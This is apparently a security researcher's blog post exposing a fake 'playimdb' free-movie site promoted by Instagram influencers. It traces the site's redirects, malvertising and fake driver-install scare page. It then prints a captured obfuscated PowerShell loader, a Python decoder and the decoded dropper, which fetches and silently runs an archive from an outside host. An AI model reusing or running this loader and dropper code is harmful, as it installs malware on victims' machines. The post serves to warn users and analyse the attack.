Free Movies or a Fake Trap? Exposing the PlayIMDb Scam Influencers Aren’t Telling You

Hey folks,

it’s been a long gap, and today I have completed my investigation on the recent IMDb free movie trend. Many influencers are making reels based on this without their knowledge that their devices may get hacked or that they may fall into some kind of scam.

In this blog, I’m not talking about movie piracy or how to prevent it. My goal is to make people aware of how easily your device can get hacked just by visiting those websites.

What Happened?

From April 15, I started seeing many reels in my feed. Most of them followed the exact same script, and I wasn’t sure why the content was so repetitive.

The reel content usually says:

“Visit the IMDb page, search for your favorite movie, and now just add ‘play’ before imdb.com.
For example: playimdb.com . Now you can watch that movie for free. Share it with your friends if it’s working.”

The main motive of these reels is to force users to visit a website that claims to provide free movies and then ask them to share it with others.

Starting the Investigation

As a security person, I was curious about how IMDb could provide free movies online like an OTT platform. So I followed the same steps mentioned in the reel.

First, I realized that it was not actually IMDb. The official IMDb domain is: www.imdb.com. However, what influencers were saying in the reel was to add the word “play” before IMDb, resulting in www.playimdb.com, which is a completely different domain.

It is not an IMDb domain as they claim in the reels.

The movie started playing, but if I clicked anywhere on the page, it redirected me to other websites. People are trusting it because IMDb is a well-known and genuine platform.

That’s when I started my analysis from here onwards.

Real Example & URL Breakdown

Example:

    Original:   https://www.imdb.com/title/tt1757678/
    Modified:   https://www.playimdb.com/title/tt1757678/
    Result:     Redirected → https://streamimdb.ru/embed/movie/tt1757678

For those who are not familiar with URLs, refer to the breakdown below:

URL: https://www.imdb.com/title/tt1757678/

Parameter	Type	Description
Protocol	string	https:// — Secure web communication (TLS)
Subdomain	string	www — Web host
Domain	string	imdb.com — Official Internet Movie Database server
Endpoint	string	/title/ — Route for movie/TV resources
Resource_ID	string	tt1757678 — Unique IMDb title identifier
Trailing_Slash	string	/ — Optional directory-style ending
Method	string	GET — Fetches the resource

Key Observation

playimdb.com and imdb.com are completely different domains.

If you visit playimdb.com, it redirects to another domain:

    https://streamimdb.ru/embed/movie/tt1757678

Technical Proof (cURL)

You can verify the redirection using:

    curl -X GET "https://playimdb.com/title/tt1757678/" -i

    HTTP/2 302
    date: Thu, 30 Apr 2026 06:44:56 GMT
    content-type: text/html; charset=UTF-8
    server: cloudflare
    nel: {"report_to":"cf-nel","success_fraction":0.0,"max_age":604800}
    location: //streamimdb.ru/embed/movie/tt1757678
    cf-cache-status: DYNAMIC
    report-to: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=0SVogWpNTduQUKrmMDyACbnPjTvMD6AmPogQo1d6ud37gIHzfA8lP6ryymkMwG1dAYiQ9aPGxFN0GPMtzjzndBEJnA1fs6%2FwjzG%2BfudAs72%2BALZNmjl2f6sx%2Fis6ANU%3D"}]}
    cf-ray: 9f4494aad97f3c4f-MAA
    alt-svc: h3=":443"; ma=86400

This clearly shows the Location header pointing to an external domain, proving it is not related to IMDb.

This confirms that the website is not related to IMDb and is simply redirecting users to another external domain.

Malvertising & Redirect Behavior

The important part is that while the movie appears to play, the website is affected by malvertising redirects.

If you randomly click anywhere on the site—such as pause, play, forward, backward, or volume controls—it redirects you to multiple external websites on each click.

I tested this behavior on both Chrome and Firefox browsers. In Firefox, the site aggressively forced me to install a browser extension.

PoC Video

I have decompiled and analyzed the extension. I will publish a separate blog explaining the full analysis in detail. For now, here are some of the potential impacts of installing unauthorized browser add-ons:

Impacts of Installing an Unauthorized Browser Add-on

• Passwords can be stolen from login forms
• Session cookies can be hijacked to access your accounts
• Browsing history and personal data can be monitored
• Banking or payment pages can be manipulated
• Forced redirects to scam or phishing sites
• Ads injected into pages you visit
• Clipboard data (passwords, crypto addresses) can be read
• Keystrokes can be logged while typing
• Screenshots or page content can be captured
• Malware can be silently downloaded to your device
• Homepage, search engine, or new tab settings can be changed
• Your data may be sold to third parties
• Social media or email accounts can be compromised
• System performance may slow down due to hidden scripts

Different Attack Observed on Chrome

I tested the same scenario on Chrome, and this time the attack behavior was completely different.

After opening the same fake IMDb site and clicking anywhere, it redirected me to a fake adult website (similar to Xhamster).

When I clicked on “Yes, 18+”, my browser immediately switched to full-screen mode, creating a more convincing and controlled environment.

Then, a fake message appeared saying that drivers were being installed and instructed me not to turn off my PC.

This is a common scare tactic used to trick users into believing that a legitimate system process is running, while in reality it may be attempting to:

• Scare users into taking further actions
• Trick users into downloading malicious files
• Redirect users to additional scam or phishing pages
• Exploit user trust by simulating system-level activity

PoC Video

Malicious Code Analysis (Obfuscated Script)

I was curious about what was actually executed in the command line, so I copied the entire data and saved it in Notepad for analysis.

The code started with:

<# Verification code: 27D393FB111A #>

For common people, this may look like a security or verification code, but as developers, we know this is just a comment and will not be executed.

The rest of the code was in hexadecimal format mixed with characters, which clearly indicates obfuscation. So I decided to analyze it deeply and decode the entire script to understand what it was actually doing.

Captured Payload

    
    <# Verification code: 27D393FB111A #>
    $w23='gOXJVW';
    $x24='43393e2c3d3208727f11052e143b3d277819023b7619332511263b2f06380e212c07373906283d380b6d5d1c3d2923250e3b211a243813203b253a6a3c1c213922320a61162f2279342a3b3f243e133608383923082c3726022e172a05706c030b3c69786d730078656d71601d687f71723f5f727f6d213f56766d2e006f5e2b0f2d71705c6b31736b1d0826366706361327786e333911750c0f1b07476703192f24132a35641f18491f393e3e0a5d751f2f220506213c253b110e233d04373a026771636d190238750322320a6f750322320a1b213a337723262a2f3523083d216a7b07063b306a723e5e6f750c3925042a240523234a012d263a6c4325697a6b1d0826366706361327786e3f6e476703192f24132a35641f18491f393e3e0a5d751f2f220506213c253b110e233d04373a026771617170492a202f71704e747c2167665a053723387a372e2c2276730e7678620d041e3c2c2f3b792e00761a37230f1262701132131d392432380a093126331906223d627f7c4068766d717c43286f636d730b7e6a77666c01202a62723a567c657a6d730a7e6b6a7b3b136f6b6a7b36092b78673838136f7c2667655c6b357b657c4c66233e242e1c263e627b39083b78620232143b751a37230f6f7c2067674e662303382108243d670132051d3d3b2332143b786703250e6f7f6d3e23133f2b707978093c34393538093c3b26392203613a2f3325482e282379601d613d323370406f750523232126342f76730d7e686a7b02142a1a2b253e041f3938253e09282503382108243d670132051d3d3b2332143b786703250e6f7f6d3e23133f2b707978093c34393538093c3b26392203613a2f3325482e2823793e092b3d3278270f3f672b6b330b692c253d320972607f373151776b7d336253776a2861625e2a687c356e552c3e2b6536037e3e29356455296a7f3567062a39793031512e6c293061567d3b7b356005783d736660413c2a296b25022c393a22340f2e7e29346a04272a253b32413d3d2c6b3f133b28397364266a6a0c7365212d31263438062b7629393a427d1e293e3204243c6f6411152a3b2b26791727286c3b38032a65383334063f2c293e364068786719221309312633774324697b767a323c3d0837240e2c082b24240e213f713f314f1b3d39227a372e2c2276730c7e69632d730b7e6a77672a02232b2f2d04132e2a3e7b040b2a3d3a767a342a3b253833146f6a372b34063b3b222d04132e2a3e7b040b2a3d3a767a342a3b253833146f6a372b6c0e2970673838136f701e33241362082b223f476b337b677e4e343d323f231a747c2467635a053723387a372e2c2276730e7678620d041e3c2c2f3b792e00761a37230f1262701132131d392432380a093126331906223d627f7e5c013d3d7b1e132a356a7b1e132a351e2f27026f1c232432043b37382f774a1f393e3e774321697e767a21202a29332b283a2c6718220b23636e39665272186271701f687f6671704a367f6d7f6c0e29706e3e6f4762362f767040687f632d73087e6d616b7f4068753a71704c6b30727f2a4320697f7d6a4f687f67397040647c2467634e747c2567624c727c2167665c263e620232143b751a37230f6f7c2067674e347e6a723d567f780a39665233173f227a293a34262b320b3c3d310523063d2c670625082c3d3925774a0931263307063b306a723c567e7867013e092b373d05231e233d6a1e3e032b3d242b6c433f697c6b10023b75093e3e0b2b113e333a4762082b223f476b367b62774a0931262232156f7264332f026f75183334123d2b2f767a2126342f2a0402233d29227a282d322f352347621e232424136f697172265678650d33234a0c30233a332e3b3d27767a372e2c227673097e6c6a7b110e232c2f24774d6135393f774a1d3d292325142a7867103e0b2a2419333b022c2c6719350d2a3b3e767a21262a39227756747c38676f5a6b363f3a3b5c6b2b7b6f6a43212d263a6c0e29706e26665166236e24665f727c3a676149092d263a1906223d7172245676656e266651611c232432043b37382f79213a342618360a2a252f3a2402263e6272265678713172255677656e276650611e3f3a3b292e352f6d73147e617772265678760e3f25022c2c25242e49092d263a1906223d37333b142a236e24665f727c2167661a74312c7e73157e60632d3e01677c39676e4e340b3e3725136208383934023c2b6a7b110e233d1a37230f6f7c38676f47620f25243c0e213f0e3f25022c2c25242e476b2b7b6f774a1831243238101c2c333a324707312e323209323d2625321c1c2c2b24234a1f2a253532143c7867103e0b2a082b223f476b2a7b6e774a1831243238101c2c333a324707312e32320932257122251e340a2f3b38112a750322320a6f75063f23023d392606361327786e3d66566f750c3925042a7867132515202a0b35230e20366a053e0b2a363e3a2e2420363e3f39122a25293723042723376d2315362323307f332a2b3e7b07063b306a723d567f713104320a202e2f7b1e132a356a7b1b0e3b3d38373b372e2c2276730d7e686a7b11083d3b2f767a223d2a252416043b312538773426342f38230b361b2538230e212d2f2b2a042e2c293e2c1a747f710523063d2c670625082c3d3925774a1831243238101c2c333a324707312e3232096f28252132153c302f3a3b4762193831220a2a363e1a3e143b786d7b19081f2a25303e0b2a7f66717a3026362e3920343b212633704b681023323302217f66717a2420352737390368746e203101243d256d321f262c';
    $y25='';
    for($z26=0;$z26 -lt $x24.Length;$z26+=2){
        $y25+=[char](([convert]::ToInt32($x24.Substring($z26,2),16))-bxor[int][char]$w23[$z26/2%$w23.Length])
    };
    &([ScriptBlock]::Create($y25))

What This Code Does

• The script is heavily obfuscated using hexadecimal encoding
• It uses XOR operations (-bxor) to decode the hidden payload
• A loop reconstructs the actual malicious script from encoded data
• The decoded content is then executed dynamically using ScriptBlock

Key Insight

This type of technique is commonly used in malware to hide the real payload and bypass basic detection mechanisms.

Once decoded, the script can perform any malicious activity such as downloading malware, stealing data, or executing further commands on the system.

Decoding Process

Rest of the code is in hex and digits, so I decided to analyze it deeply and decode the entire code to know what it is actually doing using Python.

#python code

hex_payload = """ 
43393e2c3d3208727f11052e143b3d277819023b7619332511263b2f06380e212c07373906283d380b6d5d1c3d2923250e3b211a243813203b253a6a3c1c213922320a61162f2279342a3b3f243e133608383923082c3726022e172a05706c030b3c69786d730078656d71601d687f71723f5f727f6d213f56766d2e006f5e2b0f2d71705c6b31736b1d0826366706361327786e333911750c0f1b07476703192f24132a35641f18491f393e3e0a5d751f2f220506213c253b110e233d04373a026771636d190238750322320a6f750322320a1b213a337723262a2f3523083d216a7b07063b306a723e5e6f750c3925042a240523234a012d263a6c4325697a6b1d0826366706361327786e3f6e476703192f24132a35641f18491f393e3e0a5d751f2f220506213c253b110e233d04373a026771617170492a202f71704e747c2167665a053723387a372e2c2276730e7678620d041e3c2c2f3b792e00761a37230f1262701132131d392432380a093126331906223d627f7c4068766d717c43286f636d730b7e6a77666c01202a62723a567c657a6d730a7e6b6a7b3b136f6b6a7b36092b78673838136f7c2667655c6b357b657c4c66233e242e1c263e627b39083b78620232143b751a37230f6f7c2067674e662303382108243d670132051d3d3b2332143b786703250e6f7f6d3e23133f2b707978093c34393538093c3b26392203613a2f3325482e282379601d613d323370406f750523232126342f76730d7e686a7b02142a1a2b253e041f3938253e09282503382108243d670132051d3d3b2332143b786703250e6f7f6d3e23133f2b707978093c34393538093c3b26392203613a2f3325482e2823793e092b3d3278270f3f672b6b330b692c253d320972607f373151776b7d336253776a2861625e2a687c356e552c3e2b6536037e3e29356455296a7f3567062a39793031512e6c293061567d3b7b356005783d736660413c2a296b25022c393a22340f2e7e29346a04272a253b32413d3d2c6b3f133b28397364266a6a0c7365212d31263438062b7629393a427d1e293e3204243c6f6411152a3b2b26791727286c3b38032a65383334063f2c293e364068786719221309312633774324697b767a323c3d0837240e2c082b24240e213f713f314f1b3d39227a372e2c2276730c7e69632d730b7e6a77672a02232b2f2d04132e2a3e7b040b2a3d3a767a342a3b253833146f6a372b34063b3b222d04132e2a3e7b040b2a3d3a767a342a3b253833146f6a372b6c0e2970673838136f701e33241362082b223f476b337b677e4e343d323f231a747c2467635a053723387a372e2c2276730e7678620d041e3c2c2f3b792e00761a37230f1262701132131d392432380a093126331906223d627f7e5c013d3d7b1e132a356a7b1e132a351e2f27026f1c232432043b37382f774a1f393e3e774321697e767a21202a29332b283a2c6718220b23636e39665272186271701f687f6671704a367f6d7f6c0e29706e3e6f4762362f767040687f632d73087e6d616b7f4068753a71704c6b30727f2a4320697f7d6a4f687f67397040647c2467634e747c2567624c727c2167665c263e620232143b751a37230f6f7c2067674e347e6a723d567f780a39665233173f227a293a34262b320b3c3d310523063d2c670625082c3d3925774a0931263307063b306a723c567e7867013e092b373d05231e233d6a1e3e032b3d242b6c433f697c6b10023b75093e3e0b2b113e333a4762082b223f476b367b62774a0931262232156f7264332f026f75183334123d2b2f767a2126342f2a0402233d29227a282d322f352347621e232424136f697172265678650d33234a0c30233a332e3b3d27767a372e2c227673097e6c6a7b110e232c2f24774d6135393f774a1d3d292325142a7867103e0b2a2419333b022c2c6719350d2a3b3e767a21262a39227756747c38676f5a6b363f3a3b5c6b2b7b6f6a43212d263a6c0e29706e26665166236e24665f727c3a676149092d263a1906223d7172245676656e266651611c232432043b37382f79213a342618360a2a252f3a2402263e6272265678713172255677656e276650611e3f3a3b292e352f6d73147e617772265678760e3f25022c2c25242e49092d263a1906223d37333b142a236e24665f727c2167661a74312c7e73157e60632d3e01677c39676e4e340b3e3725136208383934023c2b6a7b110e233d1a37230f6f7c38676f47620f25243c0e213f0e3f25022c2c25242e476b2b7b6f774a1831243238101c2c333a324707312e323209323d2625321c1c2c2b24234a1f2a253532143c7867103e0b2a082b223f476b2a7b6e774a1831243238101c2c333a324707312e32320932257122251e340a2f3b38112a750322320a6f75063f23023d392606361327786e3d66566f750c3925042a7867132515202a0b35230e20366a053e0b2a363e3a2e2420363e3f39122a25293723042723376d2315362323307f332a2b3e7b07063b306a723d567f713104320a202e2f7b1e132a356a7b1b0e3b3d38373b372e2c2276730d7e686a7b11083d3b2f767a223d2a252416043b312538773426342f38230b361b2538230e212d2f2b2a042e2c293e2c1a747f710523063d2c670625082c3d3925774a1831243238101c2c333a324707312e3232096f28252132153c302f3a3b4762193831220a2a363e1a3e143b786d7b19081f2a25303e0b2a7f66717a3026362e3920343b212633704b681023323302217f66717a2420352737390368746e203101243d256d321f262c
""" 
xor_key = "gOXJVW" 
def decode_payload(hex_payload, xor_key):
    cleaned_hex = "".join(hex_payload.split())
    raw_bytes = bytes.fromhex(cleaned_hex)

    result = []
    key_length = len(xor_key)

    for index, byte in enumerate(raw_bytes):
        key_char = ord(xor_key[index % key_length])
        decoded_char = chr(byte ^ key_char)
        result.append(decoded_char)

    return "".join(result)


decoded_powershell = decode_payload(hex_payload, xor_key)
print(decoded_powershell)

In the above code, I use two hardcoded strings: one is the key and the other is the hex value, which is the actual malware code. By running the above code, it simply decodes and prints the output in the terminal.

# Output (Decoded PowerShell Script)

    $vffkeo = '
    [System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;

    $g7 = "7z"
    $h8 = "wh195dV89dWg"

    # Create temp directory
    $i9 = Join-Path $env:TEMP ([System.IO.Path]::GetRandomFileName())
    New-Item -ItemType Directory -Path $i9 -Force | Out-Null

    # Define file paths
    $j10 = Join-Path $i9 ([System.IO.Path]::GetRandomFileName() + ".exe")
    $k11 = Join-Path $i9 ([System.IO.Path]::GetRandomFileName() + "." + $g7)

    $l12 = 0

    # Retry download loop
    for ($m13 = 0; $m13 -lt 3 -and -not $l12; $m13++) {
        try {
            if (-not (Test-Path $j10)) {
                Invoke-WebRequest -Uri "https://nslsconscloud.beer/api/7z.exe" `
                    -OutFile $j10 -UseBasicParsing
            }

            Invoke-WebRequest -Uri "https://nslsconscloud.beer/api/index.php?a=dl&token=85af6837e5482b759e06c92cfa3ad1fcc32f25c0aea3ff6a4cf612c1c7b7e907&src=recaptcha&cb=chrome&ref=https%3A%2F%2Fbilboad.com%2Fcheckd%2Frecap.php&mode=recaptcha" `
                -OutFile $k11 -UseBasicParsing

            if (Test-Path $k11) {
                $l12 = 1
            } else {
                Start-Sleep -Seconds 2
            }
        } catch {
            Start-Sleep -Seconds 2
        }
    }

    if (-not (Test-Path $k11)) {
        exit
    }

    # Create extraction directory
    $n14 = Join-Path $i9 ([System.IO.Path]::GetRandomFileName())
    New-Item -ItemType Directory -Path $n14 -Force | Out-Null

    # Prepare extraction arguments
    $o15 = @("x", "-y")

    if ($h8 -ne "") {
        $o15 += ("-p" + $h8)
    }

    $o15 += ("-o" + $n14)
    $o15 += $k11

    # Extract payload
    if (Test-Path $j10) {
        & $j10 @o15 | Out-Null
    } else {
        Start-Process -FilePath $k11 -WindowStyle Hidden
    }

    # Search for executable payload
    $p16 = Get-ChildItem -Path $n14 -Filter *.exe -Recurse -File | Select-Object -First 1
    $q17 = Get-ChildItem -Path $n14 -Filter *.msi -Recurse -File | Select-Object -First 1

    $r18 = $null
    $s19 = $null

    if ($p16) {
        $r18 = $p16.FullName
        $s19 = $p16.Directory.FullName
    } elseif ($q17) {
        $r18 = $q17.FullName
        $s19 = $q17.Directory.FullName
    } else {
        $r18 = $k11
    }

    # Execute payload
    if ($r18) {
        if ($s19) {
            Start-Process -FilePath $r18 -WorkingDirectory $s19 -WindowStyle Hidden
        } else {
            Start-Process -FilePath $r18 -WindowStyle Hidden
        }
    }

    # Cleanup
    try {
        Remove-Item -LiteralPath $k11 -Force -ErrorAction SilentlyContinue
    } catch {}

    try {
        if (Test-Path $j10) {
            Remove-Item -LiteralPath $j10 -Force -ErrorAction SilentlyContinue
        }
    } catch {}
    '

    # Execute in hidden PowerShell
    Start-Process -WindowStyle Hidden powershell -ArgumentList `
        "-NoProfile", "-WindowStyle", "Hidden", "-Command", $vffkeo

    exit

PowerShell Payload Behavior

This PowerShell payload silently downloads a tool and a password-protected archive from a remote server, extracts it into a temporary folder, executes the hidden file inside, and then deletes traces to remain stealthy.

Execution Steps

• Enables TLS 1.2 and creates random folders in %TEMP%
• Downloads 7z.exe from https://nslsconscloud.beer/api/7z.exe
• Downloads a protected archive from:
  https://nslsconscloud.beer/api/index.php?a=dl&token=85af6837e5482b759e06c92cfa3ad1fcc32f25c0aea3ff6a4cf612c1c7b7e907&src=recaptcha&cb=chrome&ref=https%3A%2F%2Fbilboad.com%2Fcheckd%2Frecap.php&mode=recaptcha
• Extracts the archive using the password wh195dV89dWg
• Searches for the first .exe or .msi file and executes it in hidden mode
• Deletes the downloaded archive and the 7z tool to remove evidence

Impacts of This Malware Dropper Behavior

• Silent malware installation without user knowledge
• Remote attacker control by pulling payloads from an external server
• Execution of hidden programs (.exe/.msi) in the background
• Bypasses basic security using TLS and legitimate tools (7-Zip)
• Data theft risk (files, saved passwords, browser data)
• Credential compromise and possible account takeovers
• System persistence if the payload installs startup tasks or services
• Removes traces by deleting downloaded tools and archives
• Enables further malware delivery (ransomware, spyware, RATs, miners)
• Network spread risk to other machines on the same network
• May force users to run commands in PowerShell, leading to full system compromise

Final Thoughts

Instagram is a powerful platform to share knowledge, thoughts, and creativity. Influencers act like pillars by spreading valuable content that can inspire and educate thousands.

However, chasing views with misleading or harmful content can cause serious damage, mislead users, and create long-term consequences.

Use your reach responsibly what you post can shape minds, for better or worse.